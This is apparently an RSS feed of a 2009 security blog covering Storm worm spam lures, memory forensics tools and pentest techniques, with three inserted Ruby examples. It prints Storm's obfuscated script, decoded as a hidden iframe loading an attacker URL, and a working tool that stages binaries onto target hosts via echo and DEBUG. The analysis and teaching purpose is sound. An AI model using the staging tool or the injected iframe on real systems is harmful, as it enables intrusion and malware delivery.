<?xml version="1.0" encoding="utf-8"?>
<rss version="0.92">
<channel>
<title>SecuObs.com</title>
<link>http://www.secuobs.com</link>
<description>Observatoire de la securite Internet</description>
<language>fr</language>
<webMaster>webmaster@secuobs.com</webMaster>
 <item><title>Nessus 4.2 Is Rockin'</title><description>2009-11-20 20:55:20 - John H. Sawyer : I've been testing the upcoming 4.2 release of the Nessus vulnerability scanner. The new Flash-based web interface is awesome. It runs smoother than the standalone client and has a great feature under the Reports section for comparing two scan results, which is great when you have a baseline to compare current results against. The first link has two videos, and the second shows the compare functionality. I'll be posting additional notes and screenshots as I spend more time with the beta. The Academy Pro has some excellent videos showing off the new features of Nessus 4.2: "Viewing vulnerabilities with Nessus 4.2 beta" and "Logout scanning with Nessus 4.2 beta". Also, check out the GFI videos. They're currently giving away free T-shirts to bloggers.</description><link>http://www.secuobs.com/revue/news/163529.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/163529.shtml</guid></item>
<item><title>Process memory dumping tools</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - This is from a post I had over at ForensicFocus.com. I'm working on a presentation and was trying to come up with a list of all the useful process dumpers for Windows, so I did a little Googling and found my old post. So, I stuck it here for my own future reference.
---------------------------------------------------------------------
Everyone already knows about dd for Windows from George M. Garner so I won't discuss it any further. Until the tools like those developed in the 2005 DFRWS memory forensic challenge are released, dd memory images are only as useful as the strings you pull out of them. There is some promising research from Mariusz Burdach, who just spoke at BlackHat Federal 2006 on "Finding Digital Evidence in Physical Memory". His website is located at http://forensic.seccure.net but his documentation on memory forensics is more up-to-date on the BlackHat Media Archives page. The tools/docs archive even has the Windows version of wmft.exe, which isn't on his webpage yet (just the Linux version of wmft is there).
Memdump was mentioned, but there are at least two different versions for Windows that I know of: the one mentioned previously by APsoft and another from the Metasploit project. APsoft's memdump will do any or all of memory:
MEMDUMP 386 for DOS, Version 2.00 - Release 15-Jun-2005
(C) Copyright 1993-2005 by APSoft (http://www.tssc.de). All rights reserved. Disassembly or decompilation prohibited.
This program dumps or copies any part of the 4GB memory address space of your system. For proper access to hardware registers, memory can be read with BYTE, WORD or Double WORD granularity.
Syntax: MEMDUMP [/H] [/D[B|W|D] Address[,Length]] [/F filename|none] [/B filename]
where
  /H - Print this text
  /D[B|W|D] Address[,Length] - Dump number of memory bytes from specified linear address as bytes (DB), words (DW) or double words (DD) correspondingly
  /F filename - Output file for the dump. Default: console. Use /F none to completely suppress dump
  /B filename - Output file for the binary contents of memory
Notes: Both 'Address' and 'Length' can be expressed in hexadecimal format with '0x' prefix. The 'Length' field can also be expressed in decimal.
Examples:
  MEMDUMP /DW 0x100000,0x100000 /F 2ndMB.dmp - dump second MB to file
  MEMDUMP /DB 0x100000,128 - dump 128 bytes to CON
  MEMDUMP /D 0,0x100 /F none /B IntTB.bin - copy INT table to file
If the dump or binary file exists, MEMDUMP unconditionally overwrites it. If you are using WORD or DWORD access, the 'Length' parameter should be a multiple of 2 or 4 correspondingly. Please remember that if a memory manager (such as EMM386.EXE) is loaded, MEMDUMP will read the linear address rather than the physical address.
There is almost no help for the Metasploit memdump. It dumps specific processes by giving it a PID and creates quite a few files that are to be analyzed with msfpescan. The file names look to be based on the section of memory they are pulled from. Msfpescan is crashing on my Mac OS X box right now so I can't show you the output, but here is the syntax and a sample of memdump running:
C:\y&gt;memdump.exe
Usage: y\memdump.exe &lt;pid&gt; [dump directory]
C:\y&gt;memdump.exe 2796
Creating dump directory... 2796
Attaching to 2796...
Dumping segments...
Dump completed successfully, 49 segments
Then, there is pmdump that also dumps processes:
pmdump 1.2 - (c) 2002, Arne Vidstrom (arne.vidstrom@ntsecurity.nu) - http://ntsecurity.nu/toolbox/pmdump/
Usage: pmdump &lt;pid&gt; &lt;filename&gt; - dumps the process memory contents to a file
pmdump -list - lists all running processes and their PIDs
Microsoft has several versions of userdump, but I think the latest is version 8.0 and is less than a month old. As with Metasploit's memdump, there is another tool that can read the dumped output. Dumpchk is that tool and is part of the Debugging Tools package. For it to be most useful, you need the symbols, also.
User Mode Process Dumper (Version 8.0.2826.0)
Copyright (c) 1999-2005 Microsoft Corp. All rights reserved.
userdump -p
  Displays a list of running processes and process IDs.
userdump [-k] &lt;ProcessSpec&gt; [&lt;TargetDumpFile&gt;]
  Dumps one process or processes that share an image binary file name. -k optionally causes processes to be killed after being dumped. &lt;ProcessSpec&gt; is a decimal or 0x-prefixed hex process ID, or the base name and extension (no path) of the image file used to create a process. &lt;TargetDumpFile&gt; is a legal Win32 file specification. If not specified, dump files are generated in the current directory using a name based on the image file name.
userdump -m [-k] &lt;ProcessSpec1&gt; &lt;ProcessSpec2&gt; ... [-d &lt;TargetDumpPath&gt;]
  Same as above, except dumps multiple processes. -d supplies the directory where the dumps will go. The default is the current directory.
userdump -g [-k] [-d &lt;TargetDumpPath&gt;]
  Similar to above, except dumps Win32 GUI apps that appear hung.
userdump -I [-d &lt;TargetDumpPath&gt;]
  To change the just-in-time debugger to UserDump. This command will not actually start UserDump. If you don't set up userdump, please copy userdump.exe to %windir%\system32. -d supplies the directory where the dumps will go. The default is the current directory of the target process.
That's it that I can think of for now. I will probably remember the other one or two tonight. Hope all that helps give you some direction and a realization that there is no specific way to analyze memory, but quite a few people are interested and several smart people are doing some excellent research into the area.</description><link>http://www.secuobs.com/revue/news/157775.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157775.shtml</guid></item>
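Added example (this editor's code, not from the post above or from any of the tools it lists): a minimal "strings" for raw memory images such as dd output or memdump/pmdump segment files, written in Ruby because that is the language of the other code on this page. It adds one thing to the post's remark that dd images are only as useful as the strings you pull out of them: Windows keeps most in-memory text (paths, command lines, registry keys) as UTF-16LE, so an ASCII-only pass misses it, and this scanner reports both kinds. The sample dump is constructed inline.

```ruby
# Added example, not from the post or any tool it lists: a minimal 'strings'
# for raw memory images (dd output, memdump/pmdump segment files). Windows
# stores most in-memory text as UTF-16LE, so a scanner that only looks for
# printable ASCII misses paths, command lines and registry keys.

MIN_LEN = 6   # shortest run worth reporting, in characters

# Printable-ASCII runs of at least +min_len+ bytes. Returns [[offset, text], ...].
def ascii_strings(buf, min_len = MIN_LEN)
  found = []
  buf.b.scan(/[\x20-\x7e]{#{min_len},}/n) do
    m = Regexp.last_match
    found.push([m.begin(0), m[0].force_encoding(Encoding::UTF_8)])
  end
  found
end

# UTF-16LE runs: printable ASCII code points stored as 'X\x00' pairs.
def utf16le_strings(buf, min_len = MIN_LEN)
  found = []
  buf.b.scan(/(?:[\x20-\x7e]\x00){#{min_len},}/n) do
    m = Regexp.last_match
    text = m[0].force_encoding(Encoding::UTF_16LE).encode(Encoding::UTF_8)
    found.push([m.begin(0), text])
  end
  found
end

# Both kinds, tagged and sorted by offset (what 'strings' plus 'strings -e l' give you).
def all_strings(buf, min_len = MIN_LEN)
  ascii = ascii_strings(buf, min_len).map { |off, s| [off, :ascii, s] }
  wide  = utf16le_strings(buf, min_len).map { |off, s| [off, :utf16le, s] }
  (ascii + wide).sort_by { |off, _kind, _s| off }
end

# Constructed sample "dump": 16 zero bytes, a UTF-16LE command line, seven
# bytes of noise (including a too-short ASCII run "AB"), an ASCII registry
# path and a non-printable tail.
SAMPLE_DUMP = [
  ("\x00" * 16).b,
  'C:\Windows\system32\cmd.exe /c whoami'.encode(Encoding::UTF_16LE).b,
  [0, 0, 0xff, 0x10, 0x41, 0x42, 0].pack('C*'),
  'HKLM\Software\Microsoft\Windows\CurrentVersion\Run'.b,
  ([0x00, 0x7f, 0x80, 0x90] * 4).pack('C*'),
].join

if __FILE__ == $PROGRAM_NAME
  all_strings(SAMPLE_DUMP).each do |off, kind, s|
    puts format('0x%08x %-8s %s', off, kind, s)
  end
end
```

Run it on a real image with `all_strings(File.binread('memory.dd'))`; the offsets are what you feed back to a hex viewer to see what surrounds a hit.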
<item><title>Links for AITP and FAEDS presentations</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - Thank all of you for attending my presentation. If you have any questions, please don't hesitate to e-mail me. Here are links to many of the things I talked about and demonstrated, along with several that I didn't have time to get to.
My Websites
-----------------------------------
Personal Blog: http://www.johnhsawyer.com
Dark Reading Blog: http://www.darkreading.com/blog.asp?blog_sectionid=447
UF IT Security Team: http://infosec.ufl.edu
Malware Analysis and Sandboxes
-----------------------------------
VirusTotal (submit files for analysis): http://www.virustotal.com
CWSandbox - Behavior-based Malware Analysis: http://www.cwsandbox.org
Anubis: Analyzing Unknown Binaries: http://analysis.seclab.tuwien.ac.at/index.php
Norman Sandbox: http://www.norman.com/microsites/nsic/Submit/en
Mandiant Red Curtain: http://www.mandiant.com/mrc
PEiD: http://www.secretashell.com/codomain/peid
pefile (for you Python programmers): http://dkbza.org/pefile.html
Firefox Extensions and SpiderMonkey
-----------------------------------
NoScript: http://noscript.net
User Agent Switcher: http://chrispederick.com/work/web-developer
WebDeveloper: http://chrispederick.com/work/web-developer
SpiderMonkey: http://www.mozilla.org/js/spidermonkey
Incident Response Tools (&amp; more)
-----------------------------------
Sysinternals: http://www.microsoft.com/technet/sysinternals/default.mspx (autoruns, tcpview, filemon, regmon, process monitor, openports, tor, process explorer, pstools)
Sysinternals Suite (all tools in one download): http://www.microsoft.com/technet/sysinternals/Utilities/SysinternalsSuite.mspx
DiamondCS: http://www.diamondcs.com.au/consoletools.php (cmdline, openports)
Wireshark - sniffer and protocol analyzer (formerly Ethereal): http://www.wireshark.org
Helix - CD designed for incident response and forensics (Linux &amp; Windows tools): http://www.e-fense.com/helix
Some Security Blogs
-----------------------------------
SANS Internet Storm Center: http://isc.sans.org
Windows Incident Response (Harlan Carvey) - event logs, registry and memory analysis &amp; more: http://windowsir.blogspot.com
int for(ensic){blog;} (Andreas Schuster) - event logs and memory analysis: http://computer.forensikblog.de/en
Centralizing Windows Event Logs
-----------------------------------
Series of posts on Dark Reading about logs:
Log Central: http://www.darkreading.com/blog.asp?blog_sectionid=447&amp;doc_id=132446
How to Centralize Windows Event Logs (links to Snare and Lasso): http://www.darkreading.com/blog.asp?blog_sectionid=447&amp;doc_id=132709
Watch Out for That Log: http://www.darkreading.com/blog.asp?blog_sectionid=447&amp;doc_id=133005
Miscellaneous Links
-----------------------------------
Metasploit Framework: http://framework.metasploit.com
VMware (Workstation for Linux &amp; Windows, Fusion for Mac; Server and Player are FREE): http://www.vmware.com</description><link>http://www.secuobs.com/revue/news/157774.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157774.shtml</guid></item>
<item><title>Kitties say Storm is better than catnip</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - Just when I think there's nothing new going on with Storm, in flies a few new e-mails. This time it has similar content as before, but with the hook being a cute, crazy kitty cat.
Subject: You have just received an ecard
Body: Check out the original Crazy Cat Card. It is too funny for words. http 75470217
Subject: Check out your ecard
Body: Click here to view your laughing kitty card online. http 741381191
Subject: You've got a greeting just for you
Body: Please click here to view your Crazy Kitty Card Online. http 99162220182
Here's a screenshot of the page. After looking at the source and downloading the Flash animation (the cat), I used Flare to extract any scripts. I found the original file came from http://www.superlaugh.com/1/catnip.swf. Both files were the same size but the MD5s did not match.
movie 'catnip.swf' { // flash 4, total frames: 127, frame rate: 12 fps, 360x450 px
  frame 1 { ifFrameLoaded (4) { gotoAndPlay(3); } }
  frame 2 { gotoAndPlay(1); }
  movieClip 5 { }
  button 7 { on (release) { getURL('http://www.superlaugh.com', '_top'); } }
  movieClip 14 { frame 125 { gotoAndPlay(3); } }
}
The links on the page all go to SuperLaugh.exe, which was caught by 70% of the scan engines on VirusTotal. Obfuscated Javascript was found at the bottom, just like some previous versions. It looked to be the same exploits that have been used on and off since I first started looking into Storm about a month or two ago. Also, all the images, including the kitty Flash file, were sourced from the /img directory, but it did not allow browsing of directories.</description><link>http://www.secuobs.com/revue/news/157773.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157773.shtml</guid></item>
<item><title>Because there is no patch</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - ...for human stupidity. Which is why Storm keeps spreading. There is simply no excuse for people to continue infecting themselves. I'd take a stab at antivirus companies, but they simply can't keep up. Until they all move to true behavioral-based detection, they won't be able to handle the flood of malware coming from the miscreants out there. Today, Storm worm brings us a new attempt to infect people by getting them to believe that there's a new filesharing application called Krackin. Great! Below are samples of the e-mails, screenshots and the javascript exploits.
Subject: re: krackin is released
Body: New Sharing network goes live. Check out Krackin here http xx904473
Subject: re: krackin is online
Body: Ok, last time I am sending you this linkman LOL write it down or soothing. This is krackin http xx7485128
Subject: man here is the link
Body: man here is the next huge sharing network. It is friggin awesome. Check it out http xx3724109
Here's a text file of the javascript exploit code. Handle with care.</description><link>http://www.secuobs.com/revue/news/157772.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157772.shtml</guid></item>
<item><title>Play that funky musstock spam, Storm</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - Storm has been sending out pump and dump spam for quite a while with everything from plain text to images to zips. Now, it's throwing MP3s at us. Here are two files below. So far, the subjects have been blank with "Re:" or "Fwd:". Of note, the X-Mailer is "Microsoft Outlook Express 6.00.2800.1106", but that varies with each new iteration of Storm. I've seen it claim to be Thunderbird in the past. coolringtone.mp3, firstdance.mp3</description><link>http://www.secuobs.com/revue/news/157771.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157771.shtml</guid></item>
<item><title>VMware Server 1.0.4 on Ubuntu Server 7.10 (Gutsy Gibbon)</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - Note to self: sudo apt-get install libxrender1 libxt6 libxtst6 libx11-6 build-essential xinetd linux-headers-2.6.22-14-server. I've heard VMware is available from one of the repositories, but I've not tried it. This is for installs from the downloaded tarball.</description><link>http://www.secuobs.com/revue/news/157770.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157770.shtml</guid></item>
<item><title>Ruby snippet for URI decoding</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - Ruby Module URI::Escape. I was doing some quick analysis of a page that had some obfuscated javascript with some URI encoded text. Usually, I pull out the javascript and run it through SpiderMonkey (or Didier Stevens' modified version) to see what's going on. Recently, Jordan and I were talking about CLI tools for doing encoding/decoding of things in hex, URI, binary and similar. So, I took this opportunity to figure out the Ruby for deobfuscating something like this:
eval(unescape('%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%39%61%37%62%34%37%32%32%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%69%6c%6f%76%65%6d%79%6c%6f%76%65%73%2e%63%6f%6d%2f%74%72%61%66%66%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%35%32%37%36%29%2b%27%37%61%33%62%36%38%30%39%66%38%5c%27%20%77%69%64%74%68%3d%32%30%31%20%68%65%69%67%68%74%3d%37%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29'))
Which this:
ruby -e 'require "uri"; p URI.unescape "&lt;junk_from_above&gt;"'
Returns this:
"window.status='Done';document.write('&lt;iframe name=9a7b4722 src=\'http://ilovemyloves.com/traff.php?'+Math.round(Math.random()*15276)+'7a3b6809f8\' width=201 height=76 style=\'display: none\'&gt;&lt;/iframe&gt;')"</description><link>http://www.secuobs.com/revue/news/157769.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157769.shtml</guid></item>
<item><title>Tethering a Verizon BlackBerry 8830 with Mac OS X Leopard</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - These settings go into System Preferences under the Network area. You have to add a Bluetooth device and pair the phone with the modem. If you don't know how, read the forum post that got me this far. The forum post works great with Tiger but did not work with Leopard. I had to make changes to the Advanced area to get it to work properly.
Username: PHONE_NUMBER@vzw3.com (not sure how important this is; I've done it with the BlackBerry Internet Server username also)
Password: vzw
Telephone: #777
Advanced button: Vendor: Generic, Model: Dialup Device. Leave the rest as defaults.</description><link>http://www.secuobs.com/revue/news/157768.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157768.shtml</guid></item>
<item><title>Storm &lt;3's You</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - Storm (Nuwar, CME-711, etc.) just reminded me that Valentine's is less than a month away. I've gotten four recycled e-mails looking to spread some love. When I first got the copies, only two AV vendors (NOD32v2 &amp; Webwasher-Gateway) on VirusTotal.com were detecting it as malicious.
Subject: Our Love is Free
Body: When Love Comes Knocking http 69212483
Subject: I Love Thee
Body: Words in my Heart http 241116187
Subject: A Is For Attitude
Body: A Dream is a Wish http 22210737211
Subject: Eternity of Your Love
Body: The Moon &amp; Stars http 6857210178
The webpage contains some URL encoded text that links to "with_love.exe":
'%3C%61%20%68%72%65%66%3D%22%77%69%74%68%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A'</description><link>http://www.secuobs.com/revue/news/157767.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157767.shtml</guid></item>
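Added example (this editor's code, not the one-liner from the "Ruby snippet for URI decoding" post or anything from the Valentine post above, both of which it serves): a Ruby re-implementation of JavaScript's unescape(), the function these obfuscated pages actually call. Two caveats motivate it. URI.unescape, which the post uses, was removed in Ruby 3.0, and its usual replacements (URI.decode_www_form_component and CGI.unescape) turn '+' into a space and do not understand %uXXXX escapes, so neither reproduces eval(unescape(...)) byte for byte. The two sample strings are the ones quoted on this page; the extra test inputs are constructed.

```ruby
# Added example, not the post's one-liner: emulate JavaScript's unescape().
# It decodes %XX as a single byte and %uXXXX as a UTF-16 code unit, leaves
# '+' and malformed escapes alone, and therefore gives the same bytes that
# eval(unescape('...')) would have handed to the JavaScript engine.
def js_unescape(str)
  out = ''.b
  str.b.scan(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|(.)/mn) do |uni, hex, other|
    if uni
      out.concat([uni.hex].pack('U').b)   # %u0041 -> 'A' (as UTF-8 bytes)
    elsif hex
      out.concat(hex.hex.chr.b)           # %3d -> '=' (one raw byte)
    else
      out.concat(other.b)                 # anything else passes through
    end
  end
  out.force_encoding(Encoding::UTF_8)
end

# Pull the argument out of every unescape('...') / unescape("...") call in a
# script and decode it: the text eval() would have executed, without having to
# cut the string out by hand.
def decode_unescape_calls(js)
  js.scan(/unescape\(\s*(['"])(.*?)\1\s*\)/m).map { |_quote, arg| js_unescape(arg) }
end

# Reverse direction (useful for building test data): %XX-encode every byte.
def percent_encode(str)
  str.b.bytes.map { |b| format('%%%02x', b) }.join
end

# Leading part of the encoded script from the URI-decoding post above.
POST_SAMPLE = '%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b'
# The encoded link from the Valentine post above.
STORM_SAMPLE = '%3C%61%20%68%72%65%66%3D%22%77%69%74%68%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A'

if __FILE__ == $PROGRAM_NAME
  puts js_unescape(POST_SAMPLE)
  puts js_unescape(STORM_SAMPLE).inspect
  p decode_unescape_calls("eval(unescape('#{POST_SAMPLE}'))")
end
```

The regex in decode_unescape_calls only handles a quoted literal as the argument; when the page builds the string at runtime (concatenation, split/join, String.fromCharCode) you are back to running it in SpiderMonkey as the post describes.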
<item><title>exe2hex.rb: old school pwnage</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - I figured I'd better put this up before I keep having more ideas of how to improve it and never end up posting it. What is it? Just over a month ago, a buddy (who's recently begun working for a BIG company that just happens to do some pentesting) was telling me about a pentest where they weren't allowed to upload software, so he had to write something in a batch file. While we were chatting, I began telling him of the different ways I've seen attackers put files on Windows systems: tftp, ftp (with &amp; without scripts), wget-like VBScript and echo. While echo was integral in most of the above techniques (ftp script &amp; VBScript), I'd seen a handful of hacks back in 2005 where an attacker used echo and pasted hex into a file. When the file was complete, he ran "debug &lt; 123.hex", renamed the resulting file to end with ".exe" and his tool was complete. After digging through some really old incidents I'd investigated, I found some real world examples of the technique used during compromises. A little bit of Google-ing revealed these two links: a forum post describing the technique in 2004 and a mention in a Phrack article. After sitting in on part of Ed Skoudis' new Security 560 Penetration Testing class, I saw that his class didn't mention this technique, but it covered just about all the others above. Since I would one day like to be efficient at writing Ruby, I wrote exe2hex.rb based on the C code from Riftor. Currently, due to a limitation in Microsoft's debug.exe, files must be smaller than 65,280 bytes. My next version will automatically split up files to be under the correct size and convert each one to hex. Once echo'd and converted on the target host, the individual files can be joined with "copy file1+file2+file3 /b dest /b" (or at least it should work that way... need to do more testing). Where does this tool come in handy? I have some ideas, but they'll have to wait. I need to pack things up here in the lab and head home.</description><link>http://www.secuobs.com/revue/news/157766.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157766.shtml</guid></item>
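Added example (this editor's code, not the post's exe2hex.rb and not Riftor's C): what the post's "next version" describes, in Ruby. It turns a binary into the DEBUG scripts that "debug" reads from standard input, one "e" line per 16 bytes followed by "rcx", the byte count in hex, "w" and "q"; splits the input at the 65,280-byte limit the post mentions (DEBUG loads at CS:0100 inside a single 64 KiB segment, so 0x10000 - 0x100 = 0xFF00 bytes is all one script can write); emits the "echo ...>>file" lines an operator pastes into a shell; and produces the "copy /b part1.bin+part2.bin dest" command that rejoins the parts (note the "+" between sources, which the copy syntax requires). The replay function does what DEBUG would do with a script, so a script can be checked before it goes anywhere near a target. The sample payload is constructed.

```ruby
# Added example, not the post's exe2hex.rb: build MS-DOS DEBUG scripts that
# recreate a binary on a target using only 'echo' and 'debug'. DEBUG loads
# data at CS:0100 inside one 64 KiB segment, so a single script can write at
# most 0x10000 - 0x100 = 0xFF00 = 65,280 bytes; larger inputs are split and
# rejoined on the target with 'copy /b'.

DEBUG_MAX = 0xFF00      # 65,280 bytes per DEBUG script
BYTES_PER_LINE = 16     # bytes per 'e' (enter) command

# A DEBUG script that writes +data+ to +outname+ when fed to debug's stdin.
def debug_script(data, outname)
  if data.bytesize > DEBUG_MAX
    raise ArgumentError, "#{data.bytesize} bytes exceeds DEBUG's #{DEBUG_MAX}-byte limit"
  end
  lines = ["n #{outname}"]                              # name the output file
  data.bytes.each_slice(BYTES_PER_LINE).with_index do |slice, i|
    addr = 0x100 + i * BYTES_PER_LINE
    lines.push(format('e %04X %s', addr, slice.map { |b| format('%02X', b) }.join(' ')))
  end
  lines.push('rcx', format('%X', data.bytesize))       # CX = number of bytes to write
  lines.push('w', 'q')                                  # write CS:0100..CS:0100+CX, quit
  lines.join("\r\n") + "\r\n"
end

# Split +data+ into DEBUG-sized parts. Returns [[partname, script], ...] and
# the command that reassembles the parts into +outname+ on the target.
def exe2debug(data, outname, base = 'part')
  parts = data.bytes.each_slice(DEBUG_MAX).with_index.map do |slice, i|
    name = "#{base}#{i + 1}.bin"
    [name, debug_script(slice.pack('C*'), name)]
  end
  names = parts.map { |name, _script| name }
  join = names.size == 1 ? "ren #{names[0]} #{outname}" : "copy /b #{names.join('+')} #{outname}"
  [parts, join]
end

# The lines pasted into a shell on the target to recreate +script+ as +hexfile+;
# DEBUG scripts contain only letters, hex digits and spaces, so cmd.exe has
# nothing to misinterpret. The file is then fed to debug on standard input.
def echo_lines(script, hexfile)
  script.each_line.map { |l| "echo #{l.chomp}>>#{hexfile}" }
end

# What DEBUG would do with a script: apply the 'e' lines to an empty segment
# and return the CX bytes that 'w' writes. Verifies a script before use.
def replay_debug_script(script)
  mem = Hash.new(0)
  cx = 0
  lines = script.lines.map { |l| l.strip }
  lines.each_with_index do |line, i|
    if (m = line.match(/\Ae ([0-9a-f]{4}) (.*)\z/i))
      m[2].split.each_with_index { |h, j| mem[m[1].hex + j] = h.hex }
    elsif line.casecmp('rcx').zero?
      cx = lines[i + 1].hex
    end
  end
  (0x100...(0x100 + cx)).map { |a| mem[a] }.pack('C*')
end

# Constructed sample payload (76,802 bytes), too big for one DEBUG script.
SAMPLE_BIN = ('MZ' + (0..255).to_a.pack('C*') * 300).b

if __FILE__ == $PROGRAM_NAME
  parts, join = exe2debug(SAMPLE_BIN, 'tool.exe')
  parts.each { |name, script| puts echo_lines(script, "#{name}.hex").first(3) }
  puts join
end
```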
<item><title>DefCon 16 retrospective</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - I won't bother going into any detail about the Capture the Flag competition here. You can read my blog entry over at Dark Reading or @tlas' blog for more information about our 3rd place finish and sk3wl 0f r00t's well-deserved victory. I did have an awesome time, as I've had in the previous years when we won, learned a great deal from all aspects of the CTF experience and truly enjoyed spending time with my friends and teammates from 1@stplace. What else did I do while in Vegas for DefCon? Thursday night, I finally met Tim and Kelly from Dark Reading in person for a fantastic time chatting and eating at the Mesa Grill in Caesar's Palace. They've been my editors for a year now, and I'd never actually met them. We really had a great time. Afterwards, Kelly and I went by the Core Security party where we met their new CEO, Mark Hatton, Ivan Arce, Matt Hines, several other Core employees, along with Rich Mogull and Mike Rothman. I picked up a couple of their Core Exploit (Black Hat Edition) card games but haven't had a chance to play it yet. Afterwards, Kelly tried to get me into the Microsoft party... FAIL. Friday: CTF, then Plato's room to work on CTF stuff until 2:30am. Saturday: CTF, then Plato's room to work on CTF stuff until 2:30am. (Note: if you talk to any of my teammates, they'll tell you I did take a couple small naps during the late nights and won the "quickest to fall asleep" award along with answering a few questions while sleeping... questions that weren't asked to me.) Sunday: CTF, but then I went to the Hardware Hacking Village and soldered on a USB port so I could do some badge hacking after I returned home. Next, I went to the first presentation I've ever seen at a DefCon conference. Why the first one, you ask? Because CTF takes up the entire weekend! So, the presentation was "Stealing the Internet: An Internet-Scale Man in the Middle Attack". It was pretty cool. I admit that I don't know much about BGP, so I probably thought this was way cooler than some other people, but the room was packed. The sweetest part of the presentation was that they had hijacked the DefCon network at the Riviera and had been routing through and collecting all the passing traffic through their colocation company in NY. Wicked! Sunday night: the DC16 Awards Ceremony was so packed, and I knew we didn't win, that I decided to head off to dinner with Greg. We ate at an awesome Korean BBQ restaurant and headed down the strip to relax. We wound up at Casa Fuente, where we had a few mojitos and smoked some nice Ashton cigars. Afterwards, we walked the strip and made our way back to the Riviera, where Greg had to get a little gambling out of his system. Monday: I spent the day in airports and on airplanes heading home. DefCon 16 rocked! Thank you to all my friends that I was able to see again, my brothers-in-arms from 1@stplace, Kenshoto for a great game and the DC16 organizers. See you next year! I'll post my pics soon.</description><link>http://www.secuobs.com/revue/news/157765.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157765.shtml</guid></item>
<item><title>A new obsession</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - At DefCon 16, I finally got to see some of the other things going on other than CTF. I didn't see much, but the thing that really left its mark was the Hardware Hacking Village. Greg and I went up there and I saw about 30 geeks or more going at it with soldering irons, miscellaneous computer scraps and DC16 badges. It was a cool sight. Greg had already been up there before and soldered a USB port onto his badge. I'd tried soldering a couple of times in my lifetime and failed pretty badly. This time, I was careful, asked for advice from experienced hardware hackers and was able to successfully solder on a working USB port. What a rush! I'm totally hooked and have bought a couple of soldering irons (electric and butane) to work on modding all of my badges (DC 14-16). I've got a JTAG programmer at the office somewhere that I'm going to have to dig up to work on the previous badges, I think. The thing I really want to build is an RFID cloner. The simplest, but most effective one I've found so far is the one from Chris Paget of IOActive, but his BlackHat presentation with info on building it was squashed. :-( Oh well, I'll keep searching for something that will work. It may come down to having a separate reader and transmitter/writer. I don't really care too much as long as it is portable so I can use it during physical pentests. As if I needed another obsession!</description><link>http://www.secuobs.com/revue/news/157764.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157764.shtml</guid></item>
<item><title>Shellcode Testing</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - I was working on an exploit last week that was having a problem. At one point, I thought it might have been the shellcode I was using, so I started looking for some old C code I had for testing to make sure shellcode actually ran. Nowhere to be found, I turned to Google and found the following blog that had C code and an interesting usage for it to analyze shellcode seen in malicious websites. The author extracted the shellcode from the page and put it in this C code, compiled it and ran it through OllyDbg for analysis. SIDE NOTE: Immunity has released an updated, more powerful version of Olly as the free Immunity Debugger. While the author did all this on Windows, the C code works fine on other operating systems. For example, I was working with it on FreeBSD and had no problems.</description><link>http://www.secuobs.com/revue/news/157763.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157763.shtml</guid></item>
<item><title>MS06-040 &amp; MS08-067 Similarities</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - People reversing the vulnerable code have discovered that the new MS08-067 vulnerability was present right next to the MS06-040 vulnerable code but was never noticed. Interesting. Are we really supposed to believe that no one noticed this sooner, other than the recent malware being blamed for it being outed? Alright, enough conspiracy theory. There's an exploit for MS08-067 recently posted at Milw0rm that I was testing out tonight. Out of sheer curiosity, I uploaded the precompiled binary to VirusTotal and it had already been uploaded, so there was an analysis waiting on me. The previous analysis showed 8 out of 36 AV engines detecting it. Now, there's 9. What I thought was most interesting is this: eTrust-Vet 31.6.6176 2008.10.28 Win32/MS06-040!exploit. That seems pretty darn close to me. Since the source is available for the exploit, I'll leave it to someone to dig up the old source of exploits for MS06-040 and see if there was some code sharing between the two or if the similarity of the vulnerability is causing eTrust to identify it this way.</description><link>http://www.secuobs.com/revue/news/157762.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157762.shtml</guid></item>
